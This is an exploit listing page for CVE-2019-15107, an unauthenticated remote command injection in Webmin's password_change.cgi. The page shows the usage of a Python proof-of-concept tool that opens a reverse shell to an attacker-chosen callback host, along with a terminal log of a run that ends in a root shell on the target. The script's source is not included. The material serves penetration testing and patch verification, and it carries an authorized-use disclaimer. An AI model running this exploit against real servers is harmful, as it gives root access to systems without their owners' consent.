Exploit for OS Command Injection in Webmin CVE-2019-15107

Name: Exploit for OS Command Injection in Webmin CVE-2019-15107
Rating: 5 (157 reviews)
2026-04-08 | CVSS 10.0
## https://sploitus.com/exploit?id=D2CA83CD-C0A3-592F-ADAE-CDAE8552BDE4
# CVE-2019-15107 - Webmin Unauthenticated RCE

## Description

This repository contains a proof-of-concept (PoC) exploit for CVE-2019-15107 affecting Webmin ≤ 1.920.

The vulnerability exists in the password_change.cgi endpoint, where the `old` parameter is vulnerable to command injection, allowing an unauthenticated attacker to achieve remote code execution (RCE).

## Tested Environment

The exploit was successfully tested against:

- Webmin version: 1.890
- Operating system: Ubuntu 18.04.4 LTS

## Usage

```bash
python3 cve-2019-15107.py -r  -l  [options]

options:
  -h, --help                 Show this help message and exit
  -r, --rhost RHOST          Target IP
  -rp, --rport RPORT         Target port (default: 10000)
  -l, --lhost LHOST          Local IP address for reverse shell callback
  -lp, --lport LPORT         Local port for reverse shell (default: 4343)
  -s, --scheme {http,https}  Protocol to use (default: https)
  -x, --proxy [PROXY]        Route traffic through proxy (default: http://127.0.0.1:8080)
  -n, --no-check             Skip vulnerability check and run exploit directly
```

## Example

```bash
┌──(adam㉿kali)-[~]
└─$ python3 cve-2019-15107.py -r 10.114.157.14 -l 192.168.158.129                                                                                                                                                                         

   _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
  / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
 | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
  \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  

  CVE-2019-15107 | Webmin Unauthenticated RCE
  by adampawelczyk

[*] Checking vulnerability...
[+] Target is vulnerable
[*] Starting listener on port 4343...
listening on [any] 4343 ...
[*] Sending payload...
connect to [192.168.158.129] from (UNKNOWN) [10.114.157.14] 53542
bash: cannot set terminal process group (1324): Inappropriate ioctl for device
bash: no job control in this shell
root@source:/usr/share/webmin/# whoami
whoami
root
root@source:/usr/share/webmin/# 
```

## References

- [CVE-2019-15107](https://nvd.nist.gov/vuln/detail/CVE-2019-15107)

## Disclaimer

This tool is for educational and authorized testing purposes only. Unauthorized use against systems you do not own or have permission to test is illegal. Use responsibly.